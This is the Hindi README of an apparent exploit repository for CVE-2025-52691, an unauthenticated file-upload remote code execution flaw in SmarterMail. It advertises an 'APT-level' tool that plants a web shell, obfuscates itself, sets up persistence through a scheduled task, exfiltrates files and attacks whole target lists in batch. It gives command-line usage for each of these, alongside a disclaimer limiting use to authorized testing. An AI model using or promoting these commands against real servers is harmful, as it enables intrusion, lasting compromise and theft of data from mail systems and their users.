
CVE-2025-52691 (SmarterMail मनमाना फ़ाइल अपलोड RCE) के लिए एक उन्नत प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें स्टील्थ ऑबफस्केशन, पर्सिस्टेंस, एक्सफिल्ट्रेशन और इंटरैक्टिव मोड जैसी APT-स्तरीय सुविधाएँ शामिल हैं। केवल शैक्षिक और अधिकृत परीक्षण के लिए। मूल PoC का श्रेय yt2w/CVE-2025-52691 को जाता है।
यह CVE-2025-52691 के लिए एक एन्हांस्ड प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो SmarterTools SmarterMail ईमेल सर्वर सॉफ़्टवेयर में एक गंभीर भेद्यता है, जो प्रमाणीकरण के बिना आर्बिट्ररी फ़ाइल अपलोड की अनुमति देती है, संभावित रूप से रिमोट कोड एक्ज़ीक्यूशन (RCE) की ओर ले जाती है। इस संस्करण में बेहतर स्टील्थ, पर्सिस्टेंस और संचालन क्षमताओं के लिए APT-स्तरीय तकनीकों को शामिल किया गया है, जो इसे उन्नत पेनेट्रेशन टेस्टिंग और रेड टीमिंग परिदृश्यों के लिए उपयुक्त बनाता है।
चेतावनी: यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध और अनैतिक है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
requests, uuid, base64, random, time, logging, re
pip install requestsरिपॉजिटरी को क्लोन करें और Python के साथ स्क्रिप्ट चलाएँ।
python exploit.py <target_url> [options]
<target_url>: SmarterMail सर्वर का बेस URL (जैसे, https://mail.example.com).--targets-file <file>: लक्ष्य URL की सूची वाली फ़ाइल का पथ (प्रति पंक्ति एक)।-c, --command <cmd>: शेल अपलोड के बाद निष्पादित करने का कमांड (जैसे, whoami)।-t, --timeout <seconds>: अनुरोध टाइमआउट (डिफ़ॉल्ट: 30)।--proxy <url>: प्रॉक्सी URL (जैसे, http://127.0.0.1:8080)।--no-verify: SSL प्रमाणपत्र सत्यापन अक्षम करें।--check-only: केवल जांचें कि लक्ष्य जीवित है और SmarterMail प्रतीत होता है या नहीं।--persistence: एक शेड्यूल्ड टास्क के माध्यम से पर्सिस्टेंस स्थापित करें।--exfil <remote:local>: एक फ़ाइल एक्सफ़िल्ट्रेट करें (जैसे, C:\\path\\to\\file.txt:local_copy.txt)।--interactive: इंटरैक्टिव कमांड निष्पादन मोड दर्ज करें।--cleanup: उपयोग के बाद अपलोड किए गए शेल को हटाएँ।--log-level <level>: लॉगिंग स्तर सेट करें (DEBUG, INFO, WARNING, ERROR; डिफ़ॉल्ट: INFO)।मूल एक्सप्लॉइट:
python exploit.py https://mail.vulnerable.com
कमांड निष्पादित करें:
python exploit.py https://mail.vulnerable.com -c "systeminfo"
प्रॉक्सी और पर्सिस्टेंस के साथ:
python exploit.py https://mail.vulnerable.com --proxy http://127.0.0.1:8080 --persistence
क्लीनअप के साथ इंटरैक्टिव मोड:
python exploit.py https://mail.vulnerable.com --interactive --cleanup
फ़ाइल से बैच एक्सप्लॉइट:
python exploit.py --targets-file targets.txt
सफल शोषण शेल पथ, एक्सेस URL (प्रमाणीकरण पासवर्ड के साथ), और कोई भी कमांड आउटपुट प्रदर्शित करेगा। लॉग कंसोल पर प्रिंट होते हैं; फ़ाइल लॉगिंग के लिए, आवश्यकतानुसार स्क्रिप्ट के setup_logging को संशोधित करें।
यह एन्हांस्ड संस्करण yt2w द्वारा मूल PoC पर आधारित है। महत्वपूर्ण संशोधनों में APT-स्तरीय सुविधाएँ, अस्पष्टीकरण और उपयोगिता सुधार शामिल हैं। मूल कार्य के लिए मूल लेखक का धन्यवाद।
यह उपकरण शैक्षिक उद्देश्यों के लिए एक भेद्यता प्रदर्शित करता है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनके आप मालिक हैं या जिनका परीक्षण करने की स्पष्ट अनुमति है। सभी लागू कानूनों और नैतिक दिशानिर्देशों का अनुपालन सुनिश्चित करें। डेवलपर्स दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।
यदि आपको समस्याएँ आती हैं या सुझाव हैं, तो GitHub पर एक इश्यू खोलें।
MIT लाइसेंस। विवरण के लिए LICENSE देखें।